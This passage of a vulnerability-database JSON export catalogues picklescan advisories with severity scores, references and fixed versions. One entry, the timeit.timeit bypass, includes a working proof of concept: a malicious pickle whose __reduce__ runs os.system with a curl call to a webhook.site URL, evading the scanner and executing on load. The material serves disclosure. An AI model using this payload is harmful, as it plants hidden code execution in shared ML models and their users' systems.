"https://github.com/mmaitre314/picklescan/security/advisories/GHSA-q77w-mwjj-7mqx", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-q77w-mwjj-7mqx" }, { "reference_url": "https://github.com/advisories/GHSA-q77w-mwjj-7mqx", "reference_id": "GHSA-q77w-mwjj-7mqx", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-q77w-mwjj-7mqx" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89082?format=api", "purl": "pkg:pypi/picklescan@0.0.30", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.30" } ], "aliases": [ "GHSA-q77w-mwjj-7mqx" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-n3yg-3gcp-nyc1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360535?format=api", "vulnerability_id": "VCID-p42h-2wne-j3ds", "summary": "Duplicate Advisory: Picklescan Bypass is Possible via File Extension Mismatch\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-jgw4-cr84-mqxg. This link is maintained to preserve external references.\n\n### Original Description\nAn Improper Input Validation vulnerability in the scanning logic of mmaitre314 picklescan versions up to and including 0.0.30 allows a remote attacker to bypass pickle files security checks by supplying a standard pickle file with a PyTorch-related file extension. When the pickle file incorrectly considered safe is loaded, it can lead to the execution of malicious code.", "references": [ { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10155", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10155" }, { "reference_url": "https://github.com/advisories/GHSA-j424-mc44-f4hj", "reference_id": "GHSA-j424-mc44-f4hj", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-j424-mc44-f4hj" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-jgw4-cr84-mqxg", "reference_id": "GHSA-jgw4-cr84-mqxg", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-jgw4-cr84-mqxg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89083?format=api", "purl": "pkg:pypi/picklescan@0.0.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.31" } ], "aliases": [ "GHSA-j424-mc44-f4hj" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p42h-2wne-j3ds" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212462?format=api", "vulnerability_id": "VCID-pfmh-d33z-9ka8", "summary": "Picklescan is vulnerable to RCE via missing detection when calling built-in python _operator.methodcaller", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/f2dea43e0c838e09ace1e62994143254b51de927", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/f2dea43e0c838e09ace1e62994143254b51de927" }, { "reference_url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.34", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.34" }, { "reference_url": "https://github.com/advisories/GHSA-955r-x9j8-7rhh", "reference_id": "GHSA-955r-x9j8-7rhh", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-955r-x9j8-7rhh" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-955r-x9j8-7rhh", "reference_id": "GHSA-955r-x9j8-7rhh", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-955r-x9j8-7rhh" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/36386?format=api", "purl": "pkg:pypi/picklescan@0.0.34", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.34" } ], "aliases": [ "GHSA-955r-x9j8-7rhh" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pfmh-d33z-9ka8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212452?format=api", "vulnerability_id": "VCID-q3ju-z2ut-mkgx", "summary": "Picklescan has Incomplete List of Disallowed Inputs", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab" }, { "reference_url": "https://github.com/mmaitre314/picklescan/pull/53", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/pull/53" }, { "reference_url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33" }, { "reference_url": "https://github.com/advisories/GHSA-84r2-jw7c-4r5q", "reference_id": "GHSA-84r2-jw7c-4r5q", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-84r2-jw7c-4r5q" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-84r2-jw7c-4r5q", "reference_id": "GHSA-84r2-jw7c-4r5q", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-84r2-jw7c-4r5q" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/36380?format=api", "purl": "pkg:pypi/picklescan@0.0.33", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.33" } ], "aliases": [ "GHSA-84r2-jw7c-4r5q" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-q3ju-z2ut-mkgx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212454?format=api", "vulnerability_id": "VCID-re4f-xefn-x7fb", "summary": "Picklescan Bypasses Unsafe Globals Check using pty.spawn", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab" }, { "reference_url": "https://github.com/mmaitre314/picklescan/pull/53", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/pull/53" }, { "reference_url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33" }, { "reference_url": "https://github.com/advisories/GHSA-hgrh-qx5j-jfwx", "reference_id": "GHSA-hgrh-qx5j-jfwx", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-hgrh-qx5j-jfwx" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-hgrh-qx5j-jfwx", "reference_id": "GHSA-hgrh-qx5j-jfwx", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-hgrh-qx5j-jfwx" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/36380?format=api", "purl": "pkg:pypi/picklescan@0.0.33", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.33" } ], "aliases": [ "GHSA-hgrh-qx5j-jfwx" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-re4f-xefn-x7fb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360496?format=api", "vulnerability_id": "VCID-rqap-hdeb-1ffb", "summary": "Picklescan missing detection when calling built-in python library function timeit.timeit()\n### Summary\nUsing timeit.timeit() function, which is a built-in python library function to execute remote pickle file.\n\n### Details\nPickle’s deserialization process is known to allow execution of function via reduce method. While Picklescan is meant to detect such exploits, this attack evades detection by calling built-in python library function like **timeit.timeit()**. And since timeit library wasn't inside unsafe globals blacklist, it may not raise red flag in the security scan.\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to **timeit.timeit()** function from timeit library in __reduce__ method\nThen, inside reduce method, the attacker import dangerous libarary like os and calling **os.system()** to run OS commands, for example: curl command. And then the attacker send this malicious pickle file to the victim.\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n1. The attacker crafted a malicious pickle file using built-in python library function timeit.timeit()\n```\nimport pickle\nimport timeit\nclass Payload(object):\n def __reduce__(self):\n return timeit.timeit, ('','import os; os.system(\"curl https://webhook.site/95f3e1c3-ee37-4a5a-8544-ab4ce93475f6\")')\ndef create_payload():\n with open('payload.pickle', 'wb') as f:\n pickle.dump(Payload(), f)\ncreate_payload()\n```\nThen the attacker will send this pickle file to the victim computer and maybe the victim load this pickle using pickle.load()\n2. The victim will use picklescan library to check out if the received pickle file is malicious or not\n```\npicklescan -p payload.pickle\n----------- SCAN SUMMARY -----------\nScanned files: 1\nInfected files: 0\nDangerous globals: 0\n```\n3. Beliving that this pickle file is safe using modelscan, the victim then load this pickle file which will trigger timeit.timeit command to execute OS commands (in my example, it was curl command)\n```\nimport pickle\ndef load_payload():\n with open('payload.pickle', 'rb') as f:\n pickle.load(f)\nload_payload()\n```\n### Impact\nSeverity: High\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n### Recommended Solution\nI suggest adding timeit library to the unsafe globals blacklist.", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.25", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.25" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-v7x6-rv5q-mhwc", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-v7x6-rv5q-mhwc" }, { "reference_url": "https://github.com/advisories/GHSA-v7x6-rv5q-mhwc", "reference_id": "GHSA-v7x6-rv5q-mhwc", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-v7x6-rv5q-mhwc" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/87471?format=api", "purl": "pkg:pypi/picklescan@0.0.25", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cft-ke16-8kac" }, { "vulnerability": "VCID-357d-3wwy-aubk" }, { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-3ykn-199q-u3hf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-4nda-nuz6-gqgm" }, { "vulnerability": "VCID-555e-6p5m-xbbc" }, { "vulnerability": "VCID-6723-ghp7-yqd1" }, { "vulnerability": "VCID-6pqf-4qcr-ckac" }, { "vulnerability": "VCID-6smr-kf6r-53gc" }, { "vulnerability": "VCID-7dgj-c6cm-v3bt" }, { "vulnerability": "VCID-7jv5-uxzs-cucb" }, { "vulnerability": "VCID-83zm-7pnx-gkag" }, { "vulnerability": "VCID-8bj4-tmz9-gyau" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-av36-fvk2-23be" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-b4zf-mwfc-53bm" }, { "vulnerability": "VCID-b8nm-k5xu-yfc8" }, { "vulnerability": "VCID-bepy-gm8w-83e5" }, { "vulnerability": "VCID-brvs-drts-rbay" }, { "vulnerability": "VCID-c3as-vdkf-4fem" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cj2u-dmaj-wbd4" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-cupp-7ca3-wfa6" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-d1k5-6npz-2kcg" }, { "vulnerability": "VCID-dsy5-2z6e-jqds" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fbng-xtyv-zqdf" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fsjg-pn1f-fqd6" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-hm3p-7t8t-bfb7" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-kne4-tcp8-m3c3" }, { "vulnerability": "VCID-n3yg-3gcp-nyc1" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-v5yc-uwn3-akbc" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhdd-ck3x-pbh7" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" }, { "vulnerability": "VCID-zxc5-cgwk-qbcn" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.25" } ], "aliases": [ "GHSA-v7x6-rv5q-mhwc" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rqap-hdeb-1ffb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212451?format=api", "vulnerability_id": "VCID-ssnp-77kf-qudn", "summary": "Picklescan does not block ctypes", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab" }, { "reference_url": "https://github.com/mmaitre314/picklescan/pull/53", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/pull/53" }, { "reference_url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33" }, { "reference_url": "https://github.com/advisories/GHSA-4675-36f9-wf6r", "reference_id": "GHSA-4675-36f9-wf6r", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4675-36f9-wf6r" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-4675-36f9-wf6r", "reference_id": "GHSA-4675-36f9-wf6r", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-4675-36f9-wf6r" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/36380?format=api", "purl": "pkg:pypi/picklescan@0.0.33", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.33" } ], "aliases": [ "GHSA-4675-36f9-wf6r" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ssnp-77kf-qudn" }, { 